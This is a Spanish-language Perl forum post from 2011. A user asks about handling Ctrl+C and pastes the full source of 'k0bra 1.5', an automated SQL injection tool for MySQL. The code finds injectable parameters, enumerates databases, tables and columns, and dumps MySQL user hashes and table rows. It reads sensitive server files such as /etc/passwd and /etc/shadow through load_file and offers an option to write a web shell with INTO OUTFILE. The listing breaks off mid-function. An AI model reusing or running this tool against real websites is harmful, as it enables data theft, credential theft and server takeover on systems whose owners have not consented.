Foro - Perl en Español

por **BigBear** » 2011-11-22 08:46 @406

Hola, estaba mejorando este herramienta para seguridad web que tengo desde hace tiempo y quiero que si se teclea control+C el código retorne al menú sin problemas. El problema es lo que he intentado con

Sintáxis: [ Descargar ] [ Ocultar ]

Using perl Syntax Highlighting

$SIG{INT} = \&reload;
Coloreado en 0.002 segundos,  usando GeSHi 1.0.8.4

Pero solo me retorna un valor numérico.

El código es el siguiente:

Sintáxis: [ Descargar ] [ Ocultar ]

Using perl Syntax Highlighting

#!usr/bin/perl
#k0bra 1.5
#Console version
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H
#
#
#C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
#
#
#
#
# @      @@   @
#@@     @  @ @@
# @ @@  @  @  @ @   @ @ @@@
# @ @   @  @  @@ @ @@@ @  @
# @@    @  @  @  @  @   @@@
# @ @   @  @  @  @  @  @  @
#@@@ @   @@   @@@  @@@ @@@@@
#
#
#
#
#[Status] : Scanning.....
#[Status] : Enjoy the menu
#
#[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
#[Bypass] : --
#
#
#
#--== information_schema.tables ==--
#
#[1] : Show tables
#[2] : Show columns
#[3] : Show DBS
#[4] : Show tables witg other DB
#[5] : Show columns with other DB
#
#
#--== mysql.user ==--
#
#[6] : Show users
#
#
#--== Others ==--
#
#[7] : Fuzzing tables
#[8] : Fuzzing columns
#[9] : Fuzzing files with load_file
#[10] : Dump
#[11] : Informacion of the server
#[12] : Create a shell with into outfile
#[13] : Show Log
#[14] : Exit
#
#
#[Option] : Enjoy this program xDDDDD
#
 
system('cls');
system ("title k0bra");
 
 
my @files =
 
('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini',
 
'../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/
 
httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-
 
scripts/ifcfg-eth0','/etc/redhat-
 
release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/h
 
ttpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/ap
 
ache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/acce
 
ss_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log',
 
'/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/securi
 
ty/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log',
 
'/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_
 
log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/la
 
mpp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/lo
 
gs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs
 
\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/htt
 
pd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/ht
 
tpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.c
 
onf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd
 
/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/priva
 
te/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf
 
\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/loc
 
al/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','
 
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/et
 
c/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/
 
php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/ap
 
ache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/
 
php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:
 
\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer
 
\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache
 
\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/l
 
ogs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-
 
bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles
 
\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL
 
\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles
 
\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL
 
\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL
 
\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proft
 
pd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog'
 
,'/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-
 
ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-
 
config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-
 
ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-
 
proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/va
 
r/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
 
use LWP::UserAgent;
use URI::Split qw(uri_split);
 
installer();
 
my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
 
$SIG{INT} = \&control;
 
&head;
unless(@ARGV == 2) {
&menu;
} else {
&scan($ARGV[0],$ARVG[1]);
}
&finish;
 
sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %20] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}
 
sub scan {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
<STDIN>;
&head;
&menu;
}
}
 
sub head {
system 'cls';
print qq(
 
 
 @      @@   @             
@@     @  @ @@             
 @ @@  @  @  @ @   @ @ @@@ 
 @ @   @  @  @@ @ @@@ @  @ 
 @@    @  @  @  @  @   @@@ 
 @ @   @  @  @  @  @  @  @ 
@@@ @   @@   @@@  @@@ @@@@@
 
 
 
 
);
}
 
sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ 
 
/mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su 
 
sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
 
my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
 
unless ($testar1 eq $testar2) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}
}
}
 
sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n"; 
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char
 
(69,82,84,79,82,56,53,52))))"; 
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}
 
sub menu_options {
 
menua:
 
print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";
 
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n\n--== Others ==--\n\n";
print "[7] : Fuzzing files with load_file\n";
print "[8] : Dump\n";
print "[9] : Informacion of the server\n";
print "[10] : Create a shell with into outfile\n";
print "[11] : Show Log\n";
print "[12] : Change Target\n";
print "[13] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;        
}
elsif ($opcion eq "2") {
print "\n\n[Tabla] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "7") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "9") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
elsif ($opcion eq "11") {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "12") {
&head;
&menu;
}
 
elsif ($opcion eq "13") {
&finish;
}
else {
&reload;
}
}
 
sub schematables {
 
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
my $resto = $1;
$total = $resto - 17; 
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}        
}
sub reload {
print "\n\n[+] Finish\n\n";
<STDIN>;
&head;
&menu_options;
}
 
 
sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n"; 
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}
 
sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}
 
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}
 
sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii
 
($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii
 
($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
}
 
sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) { 
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n";
}
}
 
sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++; 
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}
 
sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) { 
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}
}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}
 
sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@files) {
chomp $file;
$concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
my $code = toma($start.$concat.$end.$pass2);
chomp $code;
if ($code=~/k0bra(.*)k0bra/s) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}
 
sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){ 
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1; 
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) { 
chomp $limit;
